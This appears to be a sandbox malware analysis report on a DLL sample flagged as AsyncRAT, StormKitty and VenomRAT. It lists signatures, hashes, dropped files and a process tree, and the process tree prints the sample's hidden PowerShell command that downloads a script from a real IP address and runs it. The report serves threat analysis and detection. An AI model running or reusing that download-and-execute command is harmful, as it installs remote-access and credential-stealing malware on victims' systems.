Overview

overview

10

Static

static

3

iviewers.dll

windows7-x64

8

iviewers.dll

windows10-2004-x64

10

Analysis

  • max time kernel
    96s
  • max time network
    144s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02-01-2025 18:16

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    iviewers.dll

  • Size

    88KB

  • MD5

    33ae2b9c3e710254fe2e2ce35ff8a7c8

  • SHA1

    109e32187254b27e04ef18bbe1b48fad42bca841

  • SHA256

    9c2838e120c7ed5b582bedc6177f14a52aa578adeea269d0f96fc71a95bd6e68

  • SHA512

    2abe017e2f1d29fe789206d6483b9b33e7abd0871300d678eaba15e390d55c5e197d6cea6ea32dfdee5f65d082574adcc192a4fc0c9506bbba8ad7e957e12599

  • SSDEEP

    1536:L02ifPleVQ8zxlaSRslYzy26igsbuNdn4fuH1e6tsWy4cdlETcgS/iG:5iV4Qaxltsl/ggsCN3oBlQcgkiG

Score
10/10
asyncratstormkittyvenomratdiscoveryexecutionratstealer

Malware Config

Signatures

  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

    ratasyncrat
  • Asyncrat family
    asyncrat
  • StormKitty

    StormKitty is an open source info stealer written in C#.

    stealerstormkitty
  • StormKitty payload 1 IoCs
  • Stormkitty family
    stormkitty
  • VenomRAT 1 IoCs

    Detects VenomRAT.

    rat
  • Venomrat family
    venomrat
  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Downloads MZ/PE file
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Suspicious use of SetThreadContext 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 6 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Suspicious behavior: EnumeratesProcesses 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 26 IoCs

Processes

  • C:\Windows\system32\regsvr32.exe
    regsvr32 /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1360
    • C:\Windows\SysWOW64\regsvr32.exe
      /s C:\Users\Admin\AppData\Local\Temp\iviewers.dll
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:4316
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4868
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -windowstyle hidden -command "iwr -useb http://147.45.44.131/infopage/iubn.ps1 -Headers @{ 'X-Special-Header' = 'qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq' } | iex"
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • Suspicious use of SetThreadContext
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4720
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ylsq5aws\ylsq5aws.cmdline"
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2924
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
              C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE6B6.tmp" "c:\Users\Admin\AppData\Local\Temp\ylsq5aws\CSCA4C195AEA4AD4282B27C5238C2F6E6C.TMP"
              6⤵
              • System Location Discovery: System Language Discovery
              PID:1212
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
            5⤵
              PID:1800
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              5⤵
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of SetWindowsHookEx
              PID:1980

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\RESE6B6.tmp
      Filesize

      1KB

      MD5

      01c69299290780254ae39220a0c156ef

      SHA1

      5337c72843cc46d052cb696a3348737d617c33e1

      SHA256

      db82c28d11b6cc87a63810aa383e461b3ed490d1098ac47d872c5cc0fa97c312

      SHA512

      1ec34a9bf61c876cce16a6339b8b03ed1ce63c811f97364840eb3a9fdce512abf0b882225a82b43c0a38015f3f04ceae2ac7cf37b06ee0708431d7756c74d304

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_abjg1x1v.5wb.ps1
      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

      Download Submit

    • C:\Users\Admin\AppData\Local\Temp\ylsq5aws\ylsq5aws.dll
      Filesize

      9KB

      MD5

      5555cc83e90608cb8d0acadbbefc8e07

      SHA1

      6e3bb6ac1fd1c9711e3b34a6e8fb2f936decc78b

      SHA256

      2fc4fd7bab8376b04517587a4121e98d434b5aa2e8442b8c5ec8077f568bc32e

      SHA512

      27c45660b9bbe43b206d917b068674b3c57de134a9742530262d18b41a8cca700bb16b3d9ce8e6c6c0241279019b15a35b2bf7207d527603d68f9f8cd50046da

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\ylsq5aws\CSCA4C195AEA4AD4282B27C5238C2F6E6C.TMP
      Filesize

      652B

      MD5

      b9b773126c0858fc6c68fc114b582373

      SHA1

      9188b1fbe50f620857f7174b4de75b2dc376db3b

      SHA256

      447ad9f48aa4f8bd9205767a359e20d4aa1b263223918e9fe2e5ecaf8d4fb3a3

      SHA512

      aa732453c83d9e94b231e68cbc9faf2f682e60b628e2fa5c3fcf7331b07639fb9102fd6a3edb0ee32e8a6bd7d67b6101b899689d0efb671d65c9aed7240a2687

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\ylsq5aws\ylsq5aws.0.cs
      Filesize

      10KB

      MD5

      3fa79decff8805745cea8116d9bb2643

      SHA1

      92343c5fa2c768b964ae3a4e9136e5d7193e8558

      SHA256

      e6852a401b53a7af04d57aa1e4fc9621e3dffc1221534142316a27ae67e8f89c

      SHA512

      5c2879e59fa6609e6e87f70c5237b250a906bf7dd13a343dac9e81635b1fc91ad9374e643a306b99503c52ce9bd56554a64aa132584c732d43ee39fb17305d78

      Download Submit

    • \??\c:\Users\Admin\AppData\Local\Temp\ylsq5aws\ylsq5aws.cmdline
      Filesize

      204B

      MD5

      1d3a3cea1694a209a5091488e1210a7d

      SHA1

      a7f97fb55d145190dd71a596fec8e981378c8cbe

      SHA256

      1d1a6830c0be8777ed197dfc636fd5ae857f31fa1e0773801aa74f80456f223a

      SHA512

      2ccbeaa51188e78ccb68a9e7b578e41169d51a3be7cf62fbdd93f2c7a119b1bac0d849b8649715a9ccd3b8c0ea451ed4d7fe790919c2be43de9a7a5d9de787e8

      Download Submit

    • memory/1980-48-0x0000000006AA0000-0x0000000006DF4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/1980-47-0x0000000006450000-0x00000000064EC000-memory.dmp

      Filesize

      624KB

      Download

    • memory/1980-46-0x0000000005410000-0x000000000541A000-memory.dmp

      Filesize

      40KB

      Download

    • memory/1980-45-0x0000000005780000-0x0000000005812000-memory.dmp

      Filesize

      584KB

      Download

    • memory/1980-44-0x0000000005970000-0x0000000005F14000-memory.dmp

      Filesize

      5.6MB

      Download

    • memory/1980-40-0x0000000000400000-0x0000000000704000-memory.dmp

      Filesize

      3.0MB

      Download

    • memory/4720-22-0x0000000007090000-0x000000000709E000-memory.dmp

      Filesize

      56KB

      Download

    • memory/4720-37-0x00000000740BE000-0x00000000740BF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4720-0-0x00000000740BE000-0x00000000740BF000-memory.dmp

      Filesize

      4KB

      Download

    • memory/4720-20-0x00000000070D0000-0x000000000774A000-memory.dmp

      Filesize

      6.5MB

      Download

    • memory/4720-19-0x0000000005AD0000-0x0000000005B1C000-memory.dmp

      Filesize

      304KB

      Download

    • memory/4720-18-0x0000000005AA0000-0x0000000005ABE000-memory.dmp

      Filesize

      120KB

      Download

    • memory/4720-17-0x0000000005460000-0x00000000057B4000-memory.dmp

      Filesize

      3.3MB

      Download

    • memory/4720-7-0x0000000005330000-0x0000000005396000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4720-35-0x00000000070A0000-0x00000000070A8000-memory.dmp

      Filesize

      32KB

      Download

    • memory/4720-21-0x0000000005F90000-0x0000000005FAA000-memory.dmp

      Filesize

      104KB

      Download

    • memory/4720-38-0x00000000740B0000-0x0000000074860000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4720-6-0x00000000052C0000-0x0000000005326000-memory.dmp

      Filesize

      408KB

      Download

    • memory/4720-43-0x00000000740B0000-0x0000000074860000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4720-5-0x0000000004BC0000-0x0000000004BE2000-memory.dmp

      Filesize

      136KB

      Download

    • memory/4720-4-0x00000000740B0000-0x0000000074860000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4720-2-0x00000000740B0000-0x0000000074860000-memory.dmp

      Filesize

      7.7MB

      Download

    • memory/4720-3-0x0000000004C20000-0x0000000005248000-memory.dmp

      Filesize

      6.2MB

      Download

    • memory/4720-1-0x00000000044E0000-0x0000000004516000-memory.dmp

      Filesize

      216KB

      Download